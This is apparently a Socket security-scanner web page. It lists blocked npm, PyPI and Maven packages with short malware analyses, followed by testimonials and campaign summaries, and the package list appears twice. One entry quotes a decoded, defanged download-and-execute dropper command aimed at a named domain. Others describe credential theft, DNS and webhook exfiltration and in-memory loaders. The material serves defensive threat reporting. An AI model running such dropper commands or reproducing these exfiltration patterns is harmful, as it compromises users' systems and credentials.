
Security News
gem.coop Tests Dependency Cooldowns as Package Ecosystems Move to Slow Down Attacks
gem.coop is testing registry-level dependency cooldowns to limit exposure during the brief window when malicious gems are most likely to spread.
Quickly evaluate the security and health of any open source package.
org.webjars.npm:sweetalert2
11.16.0
Live on Maven Central
Blocked by Socket
The code contains an explicit, targeted, and malicious/undesirable behavior: for Russian-language users on specific country TLDs the library disables page interactions and injects/plays a hardcoded external audio file hosted on flag-gimn.ru. This action is unrelated to the library's purpose, creates a third-party network fetch and unsolicited playback, and persists state in localStorage. Treat this as a high-severity supply-chain compromise; do not use this version in production. Replace with a clean, audited release or remove the geo-targeted audio block.
gog-module-event-bus
1.0.1
by toastiestpine69
Removed from npm
Blocked by Socket
The code is malicious. It collects system information, encodes it, and then exfiltrates the data via DNS requests to a potentially malicious domain. This behavior is indicative of a backdoor designed to stealthily exfiltrate sensitive information from the system on which it is running.
Live on npm for 1 minute before removal. Socket users were protected even while the package was live.
multiplierz
2.2.2
Live on PyPI
Blocked by Socket
This assembly contains a highly obfuscated loader/unpacker that reads embedded resources or files, decrypts payloads using a hardcoded symmetric key, and performs unsafe native operations (OpenProcess, WriteProcessMemory, VirtualProtect, LoadLibrary/GetProcAddress, creating delegates from pointers). Those behaviors strongly indicate capabilities for in-memory code injection or runtime patching and are characteristic of malware or malicious toolkits (loaders/injectors). The public licensing API surface appears inert/stubbed, possibly to mask the malicious unpacker. Treat this package as suspicious and high-risk; do not trust or run in production without thorough dynamic analysis in a safe sandbox and full extraction/inspection of embedded resources.
mtmai
0.3.1348
Live on PyPI
Blocked by Socket
The code exposes powerful administrative actions: arbitrary shell execution, arbitrary file reads, full environment dumps, and building/pushing Docker images to a hardcoded registry. These are not obfuscated but are high-risk capabilities that can be abused for data exfiltration, remote code execution, and supply-chain leakage if the superuser authentication is compromised or misconfigured. The presence of a hardcoded remote image name for docker push is suspicious for unintended outbound artifact exfiltration. Recommendation: avoid including these endpoints in public packages or ensure strict, auditable authentication and input validation; remove hardcoded push targets and avoid returning full environment variables or arbitrary file contents.
syotools
1.1.12
Live on PyPI
Blocked by Socket
The module contains a critical deserialization/code-execution risk: yaml.load/load_all combined with a multi-constructor that evaluates 'self'+tag_suffix via eval() allows arbitrary Python execution when processing crafted YAML. No explicit malware payloads are present in the fragment, but the unsafe constructs enable an attacker to execute arbitrary actions (including data exfiltration, spawning shells, or modifying files) if they can supply or tamper with YAML inputs or saved state. Recommended mitigations: replace yaml.load/load_all with safe_load/safe_load_all; remove or replace eval-based self_constructor with a whitelist mapping of allowed tag suffixes to explicit handlers; validate/sanitize all file inputs and savefile names; remove debug prints and fix the incomplete return and other quality bugs. Treat this package as high-risk until remediated.
fsd
0.1.374
Removed from PyPI
Blocked by Socket
This module zips a local directory and uploads it to a specific S3 bucket. The code contains hardcoded AWS credentials and a hardcoded bucket name, which is a severe security issue and could enable data exfiltration if these credentials are valid. There are additional problems: a likely return-value bug (undefined variable s3_ke), possible insufficient path-safety around symlinks, and verbose logging of paths. There is no evidence of obfuscation or active payloads like reverse shells or eval-based code execution. Treat this package as high-risk until credentials are removed/rotated and the code is corrected and reviewed.
Live on PyPI for 5 days, 4 hours and 40 minutes before removal. Socket users were protected even while the package was live.
jessa-vue-components
6.21.1563
Removed from npm
Blocked by Socket
The code is malicious, as it collects and sends system information to an external server without user consent. The obfuscation and use of suspicious domains indicate a high risk of data exfiltration.
Live on npm for 10 minutes before removal. Socket users were protected even while the package was live.
vitor-js
9.3.133
Removed from npm
Blocked by Socket
This module performs deliberate, covert data exfiltration: it immediately collects system-identifying information (hostname, username, CWD), reads /etc/hosts, attempts to obtain the public IP via curl, and sends the collected data to a hardcoded Discord webhook. Behavior is malicious and privacy-invasive; the code acts as a backdoor/stealer and should not be used. Systems that loaded this module should be considered potentially compromised and investigated.
Live on npm for 4 hours and 43 minutes before removal. Socket users were protected even while the package was live.
tx-engine
0.3.5
Live on PyPI
Blocked by Socket
The code contains a critical security flaw: untrusted input can be executed via eval(op), enabling arbitrary code execution. The presence of an incomplete assertion at the end adds unreliability and potential crashes. While there is a structured path for known operations, the fallback to eval constitutes a severe vulnerability that undermines supply-chain safety for any package exposing decode_op. Recommend removing eval usage, implementing a safe expression evaluator or whitelist, and adding robust input validation and error handling.
@twork-data-services/procedure-v2-execute-as-method-request
0.99.0
by johrdanalfred
Live on npm
Blocked by Socket
The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.
vantora
1.0.3
Live on PyPI
Blocked by Socket
This module performs unsafe deserialization of an opaque cloudpickle byte blob that reconstructs executable code objects. The reconstructed payload contains clear indicators of powerful side-effecting capabilities (shell/process execution, file creation/deletion, PID/persistence management, upload/run behavior) and strings suggesting malicious/persistent behavior. The pattern (opaque blob + direct cloudpickle.loads with no integrity or provenance checks) is a severe supply-chain risk: importing this module instantiates hidden executable artifacts that can perform arbitrary actions. Treat this package as untrusted: do not import or run it in any environment you care about. Remove or replace the unsafe deserialization with auditable, explicit source code or add strong digital-signature verification and strict sandboxing before even considering use.
@nomicsfoundation/sdk-test
0.0.24
by nomicsfoundation
Live on npm
Blocked by Socket
The code contains a function that sends potentially sensitive data to an external server, which poses a significant security risk. The use of a hardcoded AES key and the transmission of encrypted data without user consent are concerning behaviors.
yxspkg
6.18.0
Live on PyPI
Blocked by Socket
The fragment is an opaque, binary/packed payload or heavily obfuscated content that cannot be reliably analyzed statically. While this alone does not prove malicious intent, it signals high risk and warrants isolation, request for a readable source or deobfuscated form, and controlled dynamic analysis to determine any harmful behavior or data leakage potential.
jessa-vue-components
0.2.1563
Removed from npm
Blocked by Socket
The code demonstrates clear malicious behavior by collecting and attempting to exfiltrate system information. The obfuscation further indicates an attempt to conceal this behavior, warranting high scores in malware, obfuscation, and risk categories.
Live on npm for 2 hours and 21 minutes before removal. Socket users were protected even while the package was live.
node-carplay
2.0.7
by rhys_m
Live on npm
Blocked by Socket
The code presents a security risk due to the use of execSync to download and execute files from a hardcoded URL without validation. This could lead to the execution of malicious code if the source is compromised.
sw-cur
1.7.0
by gtr2018
Live on npm
Blocked by Socket
This script contains malicious code that steals user credentials and modifies system files. It prompts users to enter their Cursor application username and password, then sends these credentials to external domains (t[.]sw2031[.]com and cursor[.]sw2031[.]com). Upon successful authentication, it retrieves a script from the remote server, decrypts it using a hardcoded AES key, and replaces a legitimate application file (/Applications/Cursor.app/Contents/Resources/app/extensions/cursor-always-local/dist/main.js) with the modified code that contains the user's credentials. The script also includes functionality to create backups of the original files and restore them later, which could be used to hide the malicious modifications. This is credential-stealing malware that also functions as a backdoor by modifying legitimate application files.
taichi-nightly
0.1.0
Live on PyPI
Blocked by Socket
This code contains clear backdoor-like behavior: plaintext hardcoded Gmail credentials and automatic registration of callbacks that send emails with hostname and task identifiers to an external recipient. That enables covert data exfiltration and remote notification without explicit user consent. The component should be considered malicious or at minimum unacceptable for inclusion in trusted dependencies until credentials are removed and opt-in controls and secure secret handling are implemented.
mrg-smokescreen
3.998.1
Removed from npm
Blocked by Socket
The purpose of this code appears to be collecting specific environment variables and package information, compressing and encoding it, and sending it over HTTP to a remote domain. The intent and purpose of this behavior are unclear from the provided code fragment alone.
Live on npm for 46 minutes before removal. Socket users were protected even while the package was live.
lkatbot
0.0.3
Live on PyPI
Blocked by Socket
The code exhibits remote-configurable bot control with privilege management and persistence mechanisms, which together create meaningful abuse potential and supply-chain-like risk if tampered or deployed in uncontrolled environments. While some functionality aligns with legitimate automation, the remote admin/password flow and ability to alter party state remotely constitute a backdoor-like capability. Treat as high-risk; require strict authentication, remove remote password provisioning, harden admin management, audit external endpoints, and limit self-restart behaviors. A thorough code audit and containment in a trusted build process are recommended.
sticker-convert
2.13.2.1
Live on PyPI
Blocked by Socket
This module actively harvests Discord authentication tokens by attaching to a Discord/Chromium renderer and executing JS that locates an internal getToken function. It also forcefully kills the Discord process to attach. These are direct credential-theft behaviors. Use of this code in projects poses a high risk of unauthorized account access unless used in a controlled, authorized environment with clear user consent. Recommend removing or locking down this functionality and auditing CRD implementation and any callers that handle the returned token.
org.webjars.npm:sweetalert2
11.16.0
Live on Maven Central
Blocked by Socket
The code contains an explicit, targeted, and malicious/undesirable behavior: for Russian-language users on specific country TLDs the library disables page interactions and injects/plays a hardcoded external audio file hosted on flag-gimn.ru. This action is unrelated to the library's purpose, creates a third-party network fetch and unsolicited playback, and persists state in localStorage. Treat this as a high-severity supply-chain compromise; do not use this version in production. Replace with a clean, audited release or remove the geo-targeted audio block.
gog-module-event-bus
1.0.1
by toastiestpine69
Removed from npm
Blocked by Socket
The code is malicious. It collects system information, encodes it, and then exfiltrates the data via DNS requests to a potentially malicious domain. This behavior is indicative of a backdoor designed to stealthily exfiltrate sensitive information from the system on which it is running.
Live on npm for 1 minute before removal. Socket users were protected even while the package was live.
multiplierz
2.2.2
Live on PyPI
Blocked by Socket
This assembly contains a highly obfuscated loader/unpacker that reads embedded resources or files, decrypts payloads using a hardcoded symmetric key, and performs unsafe native operations (OpenProcess, WriteProcessMemory, VirtualProtect, LoadLibrary/GetProcAddress, creating delegates from pointers). Those behaviors strongly indicate capabilities for in-memory code injection or runtime patching and are characteristic of malware or malicious toolkits (loaders/injectors). The public licensing API surface appears inert/stubbed, possibly to mask the malicious unpacker. Treat this package as suspicious and high-risk; do not trust or run in production without thorough dynamic analysis in a safe sandbox and full extraction/inspection of embedded resources.
mtmai
0.3.1348
Live on PyPI
Blocked by Socket
The code exposes powerful administrative actions: arbitrary shell execution, arbitrary file reads, full environment dumps, and building/pushing Docker images to a hardcoded registry. These are not obfuscated but are high-risk capabilities that can be abused for data exfiltration, remote code execution, and supply-chain leakage if the superuser authentication is compromised or misconfigured. The presence of a hardcoded remote image name for docker push is suspicious for unintended outbound artifact exfiltration. Recommendation: avoid including these endpoints in public packages or ensure strict, auditable authentication and input validation; remove hardcoded push targets and avoid returning full environment variables or arbitrary file contents.
syotools
1.1.12
Live on PyPI
Blocked by Socket
The module contains a critical deserialization/code-execution risk: yaml.load/load_all combined with a multi-constructor that evaluates 'self'+tag_suffix via eval() allows arbitrary Python execution when processing crafted YAML. No explicit malware payloads are present in the fragment, but the unsafe constructs enable an attacker to execute arbitrary actions (including data exfiltration, spawning shells, or modifying files) if they can supply or tamper with YAML inputs or saved state. Recommended mitigations: replace yaml.load/load_all with safe_load/safe_load_all; remove or replace eval-based self_constructor with a whitelist mapping of allowed tag suffixes to explicit handlers; validate/sanitize all file inputs and savefile names; remove debug prints and fix the incomplete return and other quality bugs. Treat this package as high-risk until remediated.
fsd
0.1.374
Removed from PyPI
Blocked by Socket
This module zips a local directory and uploads it to a specific S3 bucket. The code contains hardcoded AWS credentials and a hardcoded bucket name, which is a severe security issue and could enable data exfiltration if these credentials are valid. There are additional problems: a likely return-value bug (undefined variable s3_ke), possible insufficient path-safety around symlinks, and verbose logging of paths. There is no evidence of obfuscation or active payloads like reverse shells or eval-based code execution. Treat this package as high-risk until credentials are removed/rotated and the code is corrected and reviewed.
Live on PyPI for 5 days, 4 hours and 40 minutes before removal. Socket users were protected even while the package was live.
jessa-vue-components
6.21.1563
Removed from npm
Blocked by Socket
The code is malicious, as it collects and sends system information to an external server without user consent. The obfuscation and use of suspicious domains indicate a high risk of data exfiltration.
Live on npm for 10 minutes before removal. Socket users were protected even while the package was live.
vitor-js
9.3.133
Removed from npm
Blocked by Socket
This module performs deliberate, covert data exfiltration: it immediately collects system-identifying information (hostname, username, CWD), reads /etc/hosts, attempts to obtain the public IP via curl, and sends the collected data to a hardcoded Discord webhook. Behavior is malicious and privacy-invasive; the code acts as a backdoor/stealer and should not be used. Systems that loaded this module should be considered potentially compromised and investigated.
Live on npm for 4 hours and 43 minutes before removal. Socket users were protected even while the package was live.
tx-engine
0.3.5
Live on PyPI
Blocked by Socket
The code contains a critical security flaw: untrusted input can be executed via eval(op), enabling arbitrary code execution. The presence of an incomplete assertion at the end adds unreliability and potential crashes. While there is a structured path for known operations, the fallback to eval constitutes a severe vulnerability that undermines supply-chain safety for any package exposing decode_op. Recommend removing eval usage, implementing a safe expression evaluator or whitelist, and adding robust input validation and error handling.
@twork-data-services/procedure-v2-execute-as-method-request
0.99.0
by johrdanalfred
Live on npm
Blocked by Socket
The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.
vantora
1.0.3
Live on PyPI
Blocked by Socket
This module performs unsafe deserialization of an opaque cloudpickle byte blob that reconstructs executable code objects. The reconstructed payload contains clear indicators of powerful side-effecting capabilities (shell/process execution, file creation/deletion, PID/persistence management, upload/run behavior) and strings suggesting malicious/persistent behavior. The pattern (opaque blob + direct cloudpickle.loads with no integrity or provenance checks) is a severe supply-chain risk: importing this module instantiates hidden executable artifacts that can perform arbitrary actions. Treat this package as untrusted: do not import or run it in any environment you care about. Remove or replace the unsafe deserialization with auditable, explicit source code or add strong digital-signature verification and strict sandboxing before even considering use.
@nomicsfoundation/sdk-test
0.0.24
by nomicsfoundation
Live on npm
Blocked by Socket
The code contains a function that sends potentially sensitive data to an external server, which poses a significant security risk. The use of a hardcoded AES key and the transmission of encrypted data without user consent are concerning behaviors.
yxspkg
6.18.0
Live on PyPI
Blocked by Socket
The fragment is an opaque, binary/packed payload or heavily obfuscated content that cannot be reliably analyzed statically. While this alone does not prove malicious intent, it signals high risk and warrants isolation, request for a readable source or deobfuscated form, and controlled dynamic analysis to determine any harmful behavior or data leakage potential.
jessa-vue-components
0.2.1563
Removed from npm
Blocked by Socket
The code demonstrates clear malicious behavior by collecting and attempting to exfiltrate system information. The obfuscation further indicates an attempt to conceal this behavior, warranting high scores in malware, obfuscation, and risk categories.
Live on npm for 2 hours and 21 minutes before removal. Socket users were protected even while the package was live.
node-carplay
2.0.7
by rhys_m
Live on npm
Blocked by Socket
The code presents a security risk due to the use of execSync to download and execute files from a hardcoded URL without validation. This could lead to the execution of malicious code if the source is compromised.
sw-cur
1.7.0
by gtr2018
Live on npm
Blocked by Socket
This script contains malicious code that steals user credentials and modifies system files. It prompts users to enter their Cursor application username and password, then sends these credentials to external domains (t[.]sw2031[.]com and cursor[.]sw2031[.]com). Upon successful authentication, it retrieves a script from the remote server, decrypts it using a hardcoded AES key, and replaces a legitimate application file (/Applications/Cursor.app/Contents/Resources/app/extensions/cursor-always-local/dist/main.js) with the modified code that contains the user's credentials. The script also includes functionality to create backups of the original files and restore them later, which could be used to hide the malicious modifications. This is credential-stealing malware that also functions as a backdoor by modifying legitimate application files.
taichi-nightly
0.1.0
Live on PyPI
Blocked by Socket
This code contains clear backdoor-like behavior: plaintext hardcoded Gmail credentials and automatic registration of callbacks that send emails with hostname and task identifiers to an external recipient. That enables covert data exfiltration and remote notification without explicit user consent. The component should be considered malicious or at minimum unacceptable for inclusion in trusted dependencies until credentials are removed and opt-in controls and secure secret handling are implemented.
mrg-smokescreen
3.998.1
Removed from npm
Blocked by Socket
The purpose of this code appears to be collecting specific environment variables and package information, compressing and encoding it, and sending it over HTTP to a remote domain. The intent and purpose of this behavior are unclear from the provided code fragment alone.
Live on npm for 46 minutes before removal. Socket users were protected even while the package was live.
lkatbot
0.0.3
Live on PyPI
Blocked by Socket
The code exhibits remote-configurable bot control with privilege management and persistence mechanisms, which together create meaningful abuse potential and supply-chain-like risk if tampered or deployed in uncontrolled environments. While some functionality aligns with legitimate automation, the remote admin/password flow and ability to alter party state remotely constitute a backdoor-like capability. Treat as high-risk; require strict authentication, remove remote password provisioning, harden admin management, audit external endpoints, and limit self-restart behaviors. A thorough code audit and containment in a trusted build process are recommended.
sticker-convert
2.13.2.1
Live on PyPI
Blocked by Socket
This module actively harvests Discord authentication tokens by attaching to a Discord/Chromium renderer and executing JS that locates an internal getToken function. It also forcefully kills the Discord process to attach. These are direct credential-theft behaviors. Use of this code in projects poses a high risk of unauthorized account access unless used in a controlled, authorized environment with clear user consent. Recommend removing or locking down this functionality and auditing CRD implementation and any callers that handle the returned token.
Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.
Possible typosquat attack
Known malware
Git dependency
GitHub dependency
AI-detected potential malware
HTTP dependency
Obfuscated code
Suspicious Stars on GitHub
Telemetry
Protestware or potentially unwanted behavior
Critical CVE
High CVE
Medium CVE
Low CVE
Unpopular package
Minified code
Bad dependency semver
Wildcard dependency
Socket optimized override available
Deprecated
Unmaintained
Explicitly Unlicensed Item
License Policy Violation
Misc. License Issues
No License Found
Non-permissive License
License exception
Unidentified License
Ambiguous License Classifier
Copyleft License
Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.
Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Nat Friedman
CEO at GitHub

Suz Hinton
Senior Software Engineer at Stripe
heck yes this is awesome!!! Congrats team 🎉👏

Matteo Collina
Node.js maintainer, Fastify lead maintainer
So awesome to see @SocketSecurity launch with a fresh approach! Excited to have supported the team from the early days.

DC Posch
Director of Technology at AppFolio, CTO at Dynasty
This is going to be super important, especially for crypto projects where a compromised dependency results in stolen user assets.

Luis Naranjo
Software Engineer at Microsoft
If software supply chain attacks through npm don't scare the shit out of you, you're not paying close enough attention.
@SocketSecurity sounds like an awesome product. I'll be using socket.dev instead of npmjs.org to browse npm packages going forward

Elena Nadolinski
Founder and CEO at Iron Fish
Huge congrats to @SocketSecurity! 🙌
Literally the only product that proactively detects signs of JS compromised packages.

Joe Previte
Engineering Team Lead at Coder
Congrats to @feross and the @SocketSecurity team on their seed funding! 🚀 It's been a big help for us at @CoderHQ and we appreciate what y'all are doing!

Josh Goldberg
Staff Developer at Codecademy
This is such a great idea & looks fantastic, congrats & good luck @feross + team!
The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Scott Roberts
CISO at UiPath
As a happy Socket customer, I've been impressed with how quickly they are adding value to the product, this move is a great step!

Yan Zhu
Head of Security at Brave, DEFCON, EFF, W3C
glad to hear some of the smartest people i know are working on (npm, etc.) supply chain security finally :). @SocketSecurity

Andrew Peterson
CEO and Co-Founder at Signal Sciences (acq. Fastly)
How do you track the validity of open source software libraries as they get updated? You're prob not. Check out @SocketSecurity and the updated tooling they launched.
Supply chain is a cluster in security as we all know and the tools from Socket are "duh" type tools to be implementing. Check them out and follow Feross Aboukhadijeh to see more updates coming from them in the future.

Zbyszek Tenerowicz
Senior Security Engineer at ConsenSys
socket.dev is getting more appealing by the hour

Devdatta Akhawe
Head of Security at Figma
The @SocketSecurity team is on fire! Amazing progress and I am exciting to see where they go next.

Sebastian Bensusan
Engineer Manager at Stripe
I find it surprising that we don't have _more_ supply chain attacks in software:
Imagine your airplane (the code running) was assembled (deployed) daily, with parts (dependencies) from internet strangers. How long until you get a bad part?
Excited for Socket to prevent this

Adam Baldwin
VP of Security at npm, Red Team at Auth0/Okta
Congrats to everyone at @SocketSecurity ❤️🤘🏻

Nico Waisman
CISO at Lyft
This is an area that I have personally been very focused on. As Nat Friedman said in the 2019 GitHub Universe keynote, Open Source won, and every time you add a new open source project you rely on someone else code and you rely on the people that build it.
This is both exciting and problematic. You are bringing real risk into your organization, and I'm excited to see progress in the industry from OpenSSF scorecards and package analyzers to the company that Feross Aboukhadijeh is building!
Depend on Socket to prevent malicious open source dependencies from infiltrating your app.
Install the Socket GitHub App in just 2 clicks and get protected today.
Block 70+ issues in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.
Reduce work by surfacing actionable security information directly in GitHub. Empower developers to make better decisions.
Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.
Nov 23, 2025
Shai Hulud v2
Shai Hulud v2 campaign: preinstall script (setup_bun.js) and loader (setup_bin.js) that installs/locates Bun and executes an obfuscated bundled malicious script (bun_environment.js) with suppressed output.
Nov 05, 2025
Elves on npm
A surge of auto-generated "elf-stats" npm packages is being published every two minutes from new accounts. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified, often described as being generated every two minutes, with some mentioning a capture the flag challenge or test.
Jul 04, 2025
RubyGems Automation-Tool Infostealer
Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.
Mar 13, 2025
North Korea's Contagious Interview Campaign
Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.
Jul 23, 2024
Network Reconnaissance Campaign
A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.
Get our latest security research, open source insights, and product updates.

Security News
gem.coop is testing registry-level dependency cooldowns to limit exposure during the brief window when malicious gems are most likely to spread.

Security News
Following multiple malicious extension incidents, Open VSX outlines new safeguards designed to catch risky uploads earlier.

Research
/Security News
Threat actors compromised four oorzc Open VSX extensions with more than 22,000 downloads, pushing malicious versions that install a staged loader, evade Russian-locale systems, pull C2 from Solana memos, and steal macOS credentials and wallets.